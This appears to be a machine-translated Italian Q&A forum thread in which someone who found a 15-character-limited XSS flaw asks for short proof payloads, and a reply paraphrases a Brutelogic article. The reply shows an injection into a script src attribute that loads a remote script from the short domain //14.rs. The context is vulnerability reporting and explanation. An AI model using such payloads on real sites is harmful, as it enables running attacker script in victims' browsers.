Ho trovato una vulnerabilità XSS su un sito di grandi dimensioni e desidero segnalarlo, ma l'unico limite alla vulnerabilità è che consente solo 15 caratteri al massimo. Questo ovviamente ha dei limiti a quali payload è possibile eseguire.
Qualcuno conosce dei carichi utili interessanti di 15 caratteri o meno e dimostra la vulnerabilità a segnalarlo?
Brutelogic ha scritto un brillante articolo al riguardo su link qualche tempo fa.
Una delle idee dell'articolo (parafrasato):
.. È possibile avere un parametro URL echeggiato in un'origine di uno script:
<script src=“INPUT”></script>
Possiamo usarlo per lanciare un attacco XSS completo fornendo una sorgente con un dominio breve come //14.rs (lunghezza di 7 caratteri). Una variazione diminuisce l'iniezione a soli 5 caratteri se le doppie barre sono già nel codice nativo:
<script src=“//INPUT”></script>
# <script src=“//14.rs”></script>
Leggi altre domande sui tag xss